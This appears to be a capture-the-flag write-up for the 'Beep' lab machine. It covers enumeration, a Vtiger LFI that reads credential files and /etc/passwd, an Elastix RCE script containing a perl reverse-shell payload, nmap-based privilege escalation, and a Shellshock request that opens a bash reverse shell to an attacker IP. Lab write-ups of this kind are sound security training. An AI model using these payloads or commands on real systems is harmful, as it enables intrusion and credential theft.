10.10.10.7 - Beep - LFI, Shellshock, SUID
Example of LFI and SUID vulnerabilities
Summary:
vulnerable software : Asterisk Call Manager 1.1, POC system vulnerable : 10.10.10.7 vulnerability explanation :Local file Inclusion in the file sortfieldsjson.php severity : critical
Enumeration:
Command run:
nmap 10.10.10.70 -sV -sC
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-04 19:55 GMT Nmap scan report for 10.10.10.7 Host is up (0.16s latency). PORT STATE SERVICE VERSION 25/tcp open smtp Postfix smtpd 80/tcp open http Apache httpd 2.2.3 110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 111/tcp open rpcbind 2 (RPC #100000) 143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) 745/tcp open status 1 (RPC #100024) 993/tcp open ssl/imap Cyrus imapd 995/tcp open pop3 Cyrus pop3d 3306/tcp open mysql MySQL (unauthorized) 4190/tcp open sieve Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap) 4445/tcp open upnotifyp? 4559/tcp open hylafax HylaFAX 4.3.10 5038/tcp open asterisk Asterisk Call Manager 1.1 10000/tcp open http MiniServ 1.570 (Webmin httpd) Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 191.46 seconds PORT STATE SERVICE VERSION 69/udp open tftp? | tftp-enum: | OS79XX.TXT | RINGLIST.DAT | XMLDefault.cnf.xml | dialplan.xml | merlin2.pcm |_ syncinfo.xml
Directories discovery command:
1
dirsearch -u https://10.10.10.7/ -w ./raft-medium-directories.txt -e php,txt
2
3
_|. _ _ _ _ _ _|_ v0.3.8
4
(_||| _) (/_(_|| (_| )
5
6
Extensions: php, txt | Threads: 10 | Wordlist size: 30005
7
8
Error Log: /opt/dirsearch/logs/errors-18-01-08_15-16-00.log
9
10
Target: https://10.10.10.7/
11
12
[15:16:01] Starting:
13
[15:16:02] 301 - 309B - /admin -> https://10.10.10.7/admin/
14
[15:16:02] 301 - 310B - /images -> https://10.10.10.7/images/
15
[15:16:02] 301 - 311B - /modules -> https://10.10.10.7/modules/
16
[15:16:02] 301 - 310B - /themes -> https://10.10.10.7/themes/
17
[15:16:03] 301 - 308B - /help -> https://10.10.10.7/help/
18
[15:16:05] 301 - 307B - /var -> https://10.10.10.7/var/
19
[15:16:05] 301 - 308B - /mail -> https://10.10.10.7/mail/
20
[15:16:06] 301 - 310B - /static -> https://10.10.10.7/static/
21
[15:16:07] 301 - 308B - /lang -> https://10.10.10.7/lang/
22
[15:16:10] 301 - 308B - /libs -> https://10.10.10.7/libs/
23
[15:16:19] 301 - 309B - /panel -> https://10.10.10.7/panel/
24
[15:16:58] 301 - 311B - /configs -> https://10.10.10.7/configs/
25
[15:23:39] 301 - 314B - /recordings -> https://10.10.10.7/recordings/
26
[15:26:38] 301 - 313B - /vtigercrm -> https://10.10.10.7/vtigercrm/
27
[15:26:42] 200 - 2KB - /
Copied!
Vtiger CRM version 5.1.0 exposed on https://10.10.10.7/vtigercrm.
Asterisk looks for the asterisk.conf file in the /etc/asterisk directory, but you can supply a command line parameter to use a different asterisk.conf file. Manager.conf configuration file holds login as well as password details to other supporting applications.
Which brings us to vulnerability research, showing that Vtiger 5.1 suffers from Local File Inclusion
1
searchsploit vtiger 5.1
Copied!
Details:
1
# Exploit Title: VTiger CRM
2
# Google Dork: None
3
# Date: 20/03/2012
4
# Author: Pi3rrot
5
# Software Link: http://sourceforge.net/projects/vtigercrm/files/vtiger%20CRM%205.1.0/
6
# Version: 5.1.0
7
# Tested on: CentOS 6
8
# CVE : none
9
10
We have find this vulnerabilitie in VTiger 5.1.0
11
In this example, you can see a Local file Inclusion in the file sortfieldsjson.php
12
13
Try this :
14
https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
15
Copied!
Source code of sortfieldjson.php responsible for LFI:
1
cat sortfieldsjson.php
2
<?php
3
/*+**********************************************************************************
4
* The contents of this file are subject to the vtiger CRM Public License Version 1.0
5
* ("License"); You may not use this file except in compliance with the License
6
* The Original Code is: vtiger CRM Open Source
7
* The Initial Developer of the Original Code is vtiger.
8
* Portions created by vtiger are Copyright (C) vtiger.
9
* All Rights Reserved.
10
************************************************************************************/
11
function vtSortFieldsJson($request){
12
$moduleName = $request['module_name'];
13
require_once("modules/$moduleName/$moduleName.php");
14
$focus = new $moduleName();
15
echo Zend_Json::encode($focus->sortby_fields);
16
}
17
vtSortFieldsJson($_REQUEST);
Copied!
1
Vulnerable part of the code that allowed LFI to exist:
2
require_once("modules/$moduleName/$moduleName.php");
3
4
The require_once statement is identical to require except PHP
5
will check if the file has already been included, and if so,
6
not include (require) it again.
Copied!
With this information at hand we should be able to retrieve login details since LFI is coming from Asterisk user access account. We can download this file:
1
└──╼ $wget https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00 --no-check-certificate -O LFI
2
--2019-01-29 16:01:20-- https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
3
Connecting to 10.10.10.7:443... connected.
4
WARNING: The certificate of ‘10.10.10.7’ is not trusted.
5
WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
6
7
WARNING: The certificate of ‘10.10.10.7’ has expired.
8
The certificate has expired
9
The certificate's owner does not match hostname ‘10.10.10.7’
10
HTTP request sent, awaiting response... 200 OK
11
Length: 916 [text/html]
12
Saving to: ‘LFI’
13
14
LFI 100%[=====================================================================================================>] 916 --.-KB/s in 0s
15
16
2019-01-29 16:01:21 (8.50 MB/s) - ‘LFI’ saved [916/916]
17
Copied!
And view it:
1
└──╼ $cat LFI
2
;
3
; AMI - Asterisk Manager interface
4
;
5
; FreePBX needs this to be enabled. Note that if you enable it on a different IP, you need
6
; to assure that this can't be reached from un-authorized hosts with the ACL settings (permit/deny).
7
; Also, remember to configure non-default port or IP-addresses in amportal.conf.
8
;
9
; The AMI connection is used both by the portal and the operator's panel in FreePBX.
10
;
11
; FreePBX assumes an AMI connection to localhost:5038 by default.
12
;
13
[general]
14
enabled = yes
15
port = 5038
16
bindaddr = 0.0.0.0
17
displayconnects=no ;only effects 1.6+
18
19
[admin]
20
secret = jEhdIekWmdjE
21
deny=0.0.0.0/0.0.0.0
22
permit=127.0.0.1/255.255.255.0
23
read = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
24
write = system,call,log,verbose,command,agent,user,config,command,dtmf,reporting,cdr,dialplan,originate
25
26
#include manager_additional.conf
27
#include manager_custom.conf
Copied!
Revealing login credentials: user: admin, secret: jEhdIekWmdjE.
It is always worth using gathered credentials against the services running on the host. Since this is a Linux system with SSH server running, in this case we were able to login as root:
Moving on...
Alternatively we can look for other interesting files belonging to Vtiger such as: amportal.conf storing all the passwords:
1
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../..//etc/amportal.conf%00
Copied!
1
# FreePBX Database configuration
2
# AMPDBHOST: Hostname where the FreePBX database resides
3
# AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
4
# AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
5
# AMPDBUSER: Username used to connect to the FreePBX database
6
# AMPDBPASS: Password for AMPDBUSER (above)
7
# AMPENGINE: Telephony backend engine (e.g. asterisk)
8
# AMPMGRUSER: Username to access the Asterisk Manager Interface
9
# AMPMGRPASS: Password for AMPMGRUSER
10
#
11
AMPDBHOST=localhost
12
AMPDBENGINE=mysql
13
# AMPDBNAME=asterisk
14
AMPDBUSER=asteriskuser
15
# AMPDBPASS=amp109
16
AMPDBPASS=jEhdIekWmdjE
17
AMPENGINE=asterisk
18
AMPMGRUSER=admin
19
#AMPMGRPASS=amp111
20
AMPMGRPASS=jEhdIekWmdjE
21
22
# AMPBIN: Location of the FreePBX command line scripts
23
# AMPSBIN: Location of (root) command line scripts
24
#
25
AMPBIN=/var/lib/asterisk/bin
26
AMPSBIN=/usr/local/sbin
27
28
# AMPWEBROOT: Path to Apache's webroot (leave off trailing slash)
29
# AMPCGIBIN: Path to Apache's cgi-bin dir (leave off trailing slash)
30
# AMPWEBADDRESS: The IP address or host name used to access the AMP web admin
31
#
32
AMPWEBROOT=/var/www/html
33
AMPCGIBIN=/var/www/cgi-bin
34
# AMPWEBADDRESS=x.x.x.x|hostname
35
36
# FOPWEBROOT: Path to the Flash Operator Panel webroot (leave off trailing slash)
37
# FOPPASSWORD: Password for performing transfers and hangups in the Flash Operator Panel
38
# FOPRUN: Set to true if you want FOP started by freepbx_engine (amportal_start), false otherwise
39
# FOPDISABLE: Set to true to disable FOP in interface and retrieve_conf. Useful for sqlite3
40
# or if you don't want FOP.
41
#
42
#FOPRUN=true
43
FOPWEBROOT=/var/www/html/panel
44
#FOPPASSWORD=passw0rd
45
FOPPASSWORD=jEhdIekWmdjE
46
Copied!
Exposure of users registered on the system by reading /etc/passwd
1
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
Copied!
1
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
2
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
3
spamfilter:x:500:500::/home/spamfilter:/bin/bash
4
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
5
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
6
fanis:x:501:501::/home/fanis:/bin/bash
7
Copied!
One user especially stands out, possibly containing a user flag, we can confirm this with:
1
curl -k https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
2
aeff3def0c765c2677b94715cffa73ac
Copied!
In conclusion:
LFI vulnerability allowed us to retrieve the login credentials to FreePBX database. We have captured user.txt flag indicating that asterisk user had an access to at least standard user files. Attacker could have also taken advantage of credentials reuse to ssh into the server as an administrator.
We can also if we want to, turn this LFI info RFI. Details here.
Gaining access:
Summary:
vulnerable software : Elastix 2.2.0, POC system vulnerable : 10.10.10.7 vulnerability explanation :The $to parameter in recordings/misc/callme_page.php does not get sanitized. After a short trip in between various functions, $to ends up written to the Asterisk Management Interface socket. privilege escalation vulnerability : Vulnerable SUID program - NMAP 4.11 vulnerability fix: update both Nmap and Elastix severity : critical
Successful login with gathered credentials through LFI below and version enumeration allows us to tailor our actions for this particular service.
We learn that application hosted on the server is Elastix 2.2.0 and is vulnerable to Remote Code Execution.
Details of FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution; exploits/php/webapps/18650.py:
1
#!/usr/bin/python
2
############################################################
3
# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit
4
# Google Dork: oy vey
5
# Date: March 23rd, 2012
6
# Author: muts
7
# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.
8
# Tested on: multiple
9
# CVE : notyet
10
# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
11
# Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt
12
############################################################
13
# Discovered by Martin Tschirsich
14
# http://seclists.org/fulldisclosure/2012/Mar/234
15
# http://www.exploit-db.com/exploits/18649
16
############################################################
17
import urllib
18
rhost="172.16.254.72"
19
lhost="172.16.254.223"
20
lport=443
21
extension="1000"
22
23
# Reverse shell payload
24
25
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
26
27
urllib.urlopen(url)
Copied!
Source code of callme_page.php:
1
cat callme_page.php
2
<?php
3
4
/**
5
* @file
6
* for making call to play message
7
*/
8
9
chdir("..");
10
include_once("./includes/bootstrap.php");
11
include_once("./includes/common.php");
12
13
?>
14
15
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
16
<html xmlns="http://www.w3.org/1999/xhtml">
17
<head>
18
<TITLE>Voicemail Message Call Me Control</TITLE>
19
<link rel="stylesheet" href="../theme/main.css" type="text/css">
20
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
21
</head>
22
23
<?php
24
25
// login to database
26
$success = databaseLogon();
27
if ($success) {
28
$path = $_SESSION['ari_user']['recfiles'][$_REQUEST['recindex']];
29
$pageaction = $_REQUEST['action'];
30
$to = $_REQUEST['callmenum'];
31
$msgFrom = $_REQUEST['msgFrom'];
32
$new_path = substr($path, 0, -4); /* Without the sound file extension. */
33
$matches[0] = ''; /* init the $matches array. */
34
/* Either start or end the call me call */
35
switch($pageaction)
36
{
37
case "c":
38
/* Call me. */
39
$call_status = callme_startcall($to, $msgFrom, $new_path);
40
echo("<table class='voicemail' style='width: 100%; height: 100%; margin: 0 0 0 0; border: 0px; padding: 0px'><tr><td valign='middle' style='border: 0px'>");
41
/* if successful, display hang-up button */
42
if (callme_succeeded($call_status))
43
{
44
echo("<a href='callme_page.php?action=h&callmenum=" . $to . "'>Click here to hang up.</a>");
45
}
46
echo("</td></tr></table>");
47
echo("<script language='javascript'>parent.document.getElementById('callme_status').innerHTML = '" . _("$call_status") . "';</script>");
48
echo("<script language='javascript'>parent.document.getElementById('pb_load_inprogress').value='false';</script>");
49
echo("<script language='javascript'>parent.document.getElementById('callme_status').parentNode.style.backgroundColor = 'white';</script>");
50
break;
51
case "h":
52
/* Hang up. */
53
/* Find the channel and hang it up if it still exists. */
54
callme_hangup($to);
55
echo("<script language='javascript'>parent.document.getElementById('callme_status').innerHTML = '" . _("The call was terminated.") . "';</script>");
56
break;
57
}
58
}
59
else {
60
echo("Unable to connect to Asterisk Manager Interface");
61
}
62
63
// log off any databases needed
64
databaseLogoff();
65
66
?>
67
</body>
68
</html>
69
Copied!
Configure the exploit code:
rhost – target IP – 10.11.1.217
lhost – attacker listener IP – 10.11.0.249
lport – attacker listener port - 443
In order to succeed with this exploit we need to find out a valid extension number. We can accomplish this process with svwar - Sipvicious extension line scanner scans SIP PaBXs for valid extension lines.
Don't use in the middle of the night in order to not disturb the neighbors, got it!
We feed discovered extension (233) to our exploit code and we are ready to launch it:
Note:if you get this error below, you may want to add: import ssl ssl._create_default_https_context = ssl._create_unverified_context to the beginning of the python code.
Error code:
IOError: [Errno socket error] [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727)
Modifications to the exploit code:
Exploit code pointed towards vulnerable application and netcat catching back a reverse shell:
Privilege Escalation
Whilst looking for binaries that were given a privilege to run from a root account Nmap was identified.
1
sudo -l
2
Matching Defaults entries for asterisk on this host:
3
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
4
LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
5
LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
6
LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
7
XAUTHORITY"
8
9
User asterisk may run the following commands on this host:
10
(root) NOPASSWD: /sbin/shutdown
11
(root) NOPASSWD: /usr/bin/nmap
12
(root) NOPASSWD: /usr/bin/yum
13
(root) NOPASSWD: /bin/touch
14
(root) NOPASSWD: /bin/chmod
15
(root) NOPASSWD: /bin/chown
16
(root) NOPASSWD: /sbin/service
17
(root) NOPASSWD: /sbin/init
18
(root) NOPASSWD: /usr/sbin/postmap
19
(root) NOPASSWD: /usr/sbin/postfix
20
(root) NOPASSWD: /usr/sbin/saslpasswd2
21
(root) NOPASSWD: /usr/sbin/hardware_detector
22
(root) NOPASSWD: /sbin/chkconfig
23
(root) NOPASSWD: /usr/sbin/elastix-helper
24
Copied!
SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. In simple words users will get file owner’s permissions as well as owner UID and GID when executing a file/program/command.
Until version 5.50, Nmap had an interactive option available, allowing for execution of arbitrary commands on the system:
1
sudo nmap --interactive
Copied!
Summary:
vulnerable software : MiniServ 1.570, POC system vulnerable : 10.10.10.7:10000 vulnerability explanation :Shellshock, CVE-2014-6271 severity : critical
On top of that the server was also vulnerable to Shellshock injection as it is running vulnerable MiniServ Webmin 1.570 Webmin HTTP on port 10000 exposing /file/show.cgi to the public:
Proof:
Theory:
When a web server uses the Common Gateway Interface (CGI) to handle a document request, it passes various details of the request to a handler program in the environment variable list. For example, the variable HTTP_USER_AGENT has a value that, in normal usage, identifies the program sending the request. If the request handler is a Bash script, or if it executes one for example using the system(3) call, Bash will receive the environment variables passed by the server and will process them as described above. This provides a means for an attacker to trigger the Shellshock vulnerability with a specially crafted server request. Security documentation for the widely used Apache web server states: "CGI scripts can ... be extremely dangerous if they are not carefully checked." and other methods of handling web server requests are often used. There are a number of online services which attempt to test the vulnerability against web servers exposed to the Internet.
Reference
Shellshock exploitation:
Burp sending the request and triggering the shell:
I was also curious what happens during exploitation, so I copied above command as a curl request and made a request to the victim:
1
└──╼ $curl -i -s -k -X #x27;GET' \
2
> -H #x27;Host: 10.10.10.7:10000' -H #x27;user-agent: () { :; }; bash -i >& /dev/tcp/10.10.14.20/4444 0>&1' -H #x27;Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H #x27;Accept-Language: en-US,en;q=0.5' -H #x27;Accept-Encoding: gzip, deflate' -H #x27;DNT: 1' -H #x27;Connection: close' -H #x27;Upgrade-Insecure-Requests: 1' \
3
> #x27;https://10.10.10.7:10000/file/show.cgi'
4
HTTP/1.0 200 Document follows
5
Date: Wed, 30 Jan 2019 21:53:35 GMT
6
Server: MiniServ/1.570
7
Connection: close
8
Set-Cookie: testing=1; path=/; secure
9
pragma: no-cache
10
Expires: Thu, 1 Jan 1970 00:00:00 GMT
11
Cache-Control: no-store, no-cache, must-revalidate
12
Cache-Control: post-check=0, pre-check=0
13
Content-type: text/html; Charset=iso-8859-1
14
15
<!doctype html public "-//W3C//DTD HTML 3.2 Final//EN">
16
<html>
17
<head>
18
<link rel='stylesheet' type='text/css' href='/unauthenticated/style.css' />
19
<script type='text/javascript' src='/unauthenticated/toggleview.js'></script>
20
<script>
21
var rowsel = new Array();
22
</script>
23
<script type='text/javascript' src='/unauthenticated/sorttable.js'></script>
24
<meta http-equiv="Content-Type" content="text/html; Charset=iso-8859-1">
25
Copied!
Successful reverse shell and confirmation of vulnerable Bash environment:
Copy link